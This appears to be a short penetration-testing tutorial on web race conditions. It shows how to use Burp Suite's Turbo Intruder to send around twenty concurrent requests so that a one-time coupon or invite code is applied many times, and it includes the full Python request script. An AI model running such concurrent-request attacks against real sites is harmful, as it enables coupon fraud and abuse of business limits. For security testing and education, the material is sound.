Web Race Condition

Race condition is a vulnerability of web applications by concurrent requests to circumvent limiting the state.

Investigation

If target website has the functionality that logged-in user can apply the 10% off code for buying products, the code must be applied only one time most of the time. However, this rule might be bypassed by exploiting race condition vulnerability with concurrent requests.

Race Condition Attack using Turbo Intruder in Burp Suite

We can easily achieve race condition attack by using Turbo Intruder.

1. In Burp Suite, right-click on specific request.

2. Select Extensions → Turbo Intruder. If it does not exist, you need to install it in the BApp Store of Burp Suite.

3. In Turbo Intruder window, set specific value to the concurrentConnection param of the RequestEngine method. This value is up to target website logic. For example, if we need to apply coupon code 20 times in EC site, set 20.

   def queueRequests(target, wordlists):
       engine = RequestEngine(
           endpoint=target.endpoint,
           concurrentConnections=20, # change this value for race condition.
           requestsPerConnection=1,
           pipeline=False)
   
       # For loop requests
       i = 0
       while i < 100: # this value is arbitrary but not very important for this situation.
           engine.queue(target.req, None)
           i += 1
   
   def handleResponse(req, interesting):
       if interesting:
           table.add(req)

4. Now click Attack button. Since the request N times at the same time, we may be able to bypass the limit to be applied some code e.g. coupon, invite code, etc.